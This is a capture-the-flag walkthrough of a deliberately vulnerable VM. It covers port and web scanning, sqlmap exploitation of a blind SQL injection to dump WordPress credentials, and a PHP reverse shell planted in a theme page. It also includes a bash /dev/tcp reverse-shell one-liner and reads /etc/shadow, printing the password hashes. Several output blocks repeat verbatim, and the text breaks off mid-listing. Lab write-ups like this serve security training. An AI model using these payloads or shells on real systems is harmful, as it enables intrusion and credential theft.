Enumeration
After spinning up the VM in VirtualBox, I located its DHCP Address on my local nat network, and had at it:
root@kali:~# nmap -A 10.1.1.11
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT
Nmap scan report for 10.1.1.11
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after: 2025-02-14T03:30:05+00:00
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.
8080/tcp open http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.1.1.11
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds
root@kali:~#
______________________________________________________________________________
A quick viewing of some of the hosted webpages brought this challenge close to my geek heart:
Paying heed to the Jedi Mind Trick, I pushed forward
Continuing with my normal enumeration process, I used nikto to possibly identify any low hanging fruit or directories.
This was overlooked -- Nikto scan on port 80 found login.php
root@kali:~# nikto -h 10.1.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.11
+ Target Hostname: 10.1.1.11
+ Target Port: 80
+ Start Time: 2015-05-22 23:47:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2015-05-22 23:48:12 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
root@kali:~# nikto -h 10.1.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.11
+ Target Hostname: 10.1.1.11
+ Target Port: 80
+ Start Time: 2015-05-22 23:47:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2015-05-22 23:48:12 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
______________________________________________________________________________
Needing more information, I turned to Dirbuster to reveal the site's structure or any hidden pages. I quickly found a wordpress site hosted both on port 443 & 8080.
Ok, at this point I was starting to get happy, due to the rich amount of Wordpress vulnerabilities out there. I turned to wpscan trying to enumerate the admin user and find any vulns:
root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.6
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://10.1.1.11:8080/wordpress/
[+] Started: Fri May 22 21:41:21 2015
[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php
[+] WordPress version 4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
| 4 plugins found:
[+] Name: cart66-lite - v1.5.3
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7737
Reference: https://research.g0blin.co.uk/g0blin-00022/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4
[+] Name: contact-form-7 - v4.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
[+] Name: proplayer - v4.7.9.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt
[!] Title: ProPlayer 4.7.9.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/6912
Reference: http://osvdb.org/93564
Reference: http://www.exploit-db.com/exploits/25605/
[+] Name: all-in-one-seo-pack - v2.2.5.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri May 22 21:41:28 2015
[+] Memory used: 3.234 MB
[+] Elapsed time: 00:00:06
root@kali:~#
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.6
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://10.1.1.11:8080/wordpress/
[+] Started: Fri May 22 21:41:21 2015
[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php
[+] WordPress version 4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
| 4 plugins found:
[+] Name: cart66-lite - v1.5.3
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7737
Reference: https://research.g0blin.co.uk/g0blin-00022/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4
[+] Name: contact-form-7 - v4.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
[+] Name: proplayer - v4.7.9.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt
[!] Title: ProPlayer 4.7.9.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/6912
Reference: http://osvdb.org/93564
Reference: http://www.exploit-db.com/exploits/25605/
[+] Name: all-in-one-seo-pack - v2.2.5.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri May 22 21:41:28 2015
[+] Memory used: 3.234 MB
[+] Elapsed time: 00:00:06
root@kali:~#
_____________________________________________________________________________
Ok, there are a couple of SQL injection one for the Cart66 Lite Plugin. This one requires credentials which I don't have yet..
The ProPlayer Injection plain didn't work for me...
I also tried to brute force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes I found the login.php page in my nikto output:
Browsing to it I found a simple login page which had SQL injection written all over it:
I started a handful of the command injection strings, the author of the VM helped us out a bit by coding a 1 or 0 visible on the page.
A series of single quotes revealed that there was an underlying Mysql database on the server. Sounds like a job for sqlmap:
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:53:02
[23:53:02] [INFO] resuming back-end DBMS 'mysql'
[23:53:02] [INFO] testing connection to the target URL
[23:53:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:53:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:53:03] [INFO] fetching database names
[23:53:03] [INFO] fetching number of databases
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[23:53:19] [INFO] retrieved:
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[23:54:35] [INFO] retrieved: login
[23:54:58] [INFO] retrieved: mysql
[23:55:18] [INFO] retrieved: performance_schema
[23:56:29] [INFO] retrieved: phpmyadmin
[23:57:13] [INFO] retrieved: users
[23:57:32] [INFO] retrieved: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080
[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:58:32
root@kali:~#
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:53:02
[23:53:02] [INFO] resuming back-end DBMS 'mysql'
[23:53:02] [INFO] testing connection to the target URL
[23:53:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:53:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:53:03] [INFO] fetching database names
[23:53:03] [INFO] fetching number of databases
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[23:53:19] [INFO] retrieved:
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[23:54:35] [INFO] retrieved: login
[23:54:58] [INFO] retrieved: mysql
[23:55:18] [INFO] retrieved: performance_schema
[23:56:29] [INFO] retrieved: phpmyadmin
[23:57:13] [INFO] retrieved: users
[23:57:32] [INFO] retrieved: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080
[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:58:32
root@kali:~#
_______________________________________________________________________________
Poking around in each DB with sqlmap I ultimately found the wordpress admin account:
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:46:07
[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory
[23:46:07] [INFO] testing connection to the target URL
[23:46:07] [INFO] heuristics detected web page charset 'ascii'
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:46:08] [INFO] target URL is stable
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:46:09] [INFO] testing 'MySQL inline queries'
[23:46:09] [INFO] testing 'PostgreSQL inline queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[23:46:09] [INFO] testing 'Oracle inline queries'
[23:46:09] [INFO] testing 'SQLite inline queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'
[23:46:45] [INFO] retrieved:
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[23:46:54] [INFO] retrieved:
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times
users
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'
[23:47:21] [INFO] retrieved: 2
[23:47:23] [INFO] retrieved: username
[23:47:53] [INFO] retrieved: password
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] retrieved: 1
[23:48:29] [INFO] retrieved: SuperSecretPassword
[23:49:44] [INFO] retrieved: admin
[23:50:03] [INFO] analyzing table dump for possible password hashes
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:50:03
root@kali:~#
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:46:07
[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory
[23:46:07] [INFO] testing connection to the target URL
[23:46:07] [INFO] heuristics detected web page charset 'ascii'
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:46:08] [INFO] target URL is stable
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:46:09] [INFO] testing 'MySQL inline queries'
[23:46:09] [INFO] testing 'PostgreSQL inline queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[23:46:09] [INFO] testing 'Oracle inline queries'
[23:46:09] [INFO] testing 'SQLite inline queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'
[23:46:45] [INFO] retrieved:
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[23:46:54] [INFO] retrieved:
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times
users
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'
[23:47:21] [INFO] retrieved: 2
[23:47:23] [INFO] retrieved: username
[23:47:53] [INFO] retrieved: password
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] retrieved: 1
[23:48:29] [INFO] retrieved: SuperSecretPassword
[23:49:44] [INFO] retrieved: admin
[23:50:03] [INFO] analyzing table dump for possible password hashes
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:50:03
root@kali:~#
________________________________________________________________________________
Lets use the new found credentials:
Bingo:
Now, I have used multiple ways to get a shell while hacking wordpress, often times uploading a plugin which allows to modification of file types when .php extensions are blocked. Yes that was the case here as well. (Also, the Cart66 SQL Injection exploit may work now as well). However a good friend brought the obvious thing to my attention; "Why go through the trouble of uploading a plugin potentially leaving tracks when you can just update an existing page within wordpress with your own php code?". I had no logical answer. So I did it, and it was much easier.
Those of you who are familiar with Kali, there are webshells for most of your needs in the following directory:
/usr/share/webshells/php
Penetration
The php-reverse-shell.php is identical to the one hosted by pentestmonkey. I was able to simply cut and paste the contents of the file into the 404.page in wordpress.
There is one aspect of the shell which needs to be modified to match your attacking machine address:
$ip = '10.1.1.5'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$port = 1234; // CHANGE THIS
After starting a netcat listner on port 1234 and browsing to the now malicious 404.php page, the reverseshell is executed:
Now that we have a limited shell, we'll need to escape from it. Whenever possible, I use the follwing python shell escape sequence:
python -c 'import pty; pty.spawn("/bin/bash")'
Here are a couple of other valuable shell escape sequences, python won't always be at your disposal:
bash -i >& /dev/tcp/192.168.22.10/443 0>&1
/bin/sh -i
and... creating and copying a public keyfile to the .authorized_keys directory on the victim; more to come on this in a separate write-up.
Once I had a decent shell, things moved pretty quickly due to permissions on the etc/shadow file:
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@Freshly:/$
daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/$
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$
daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/$
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
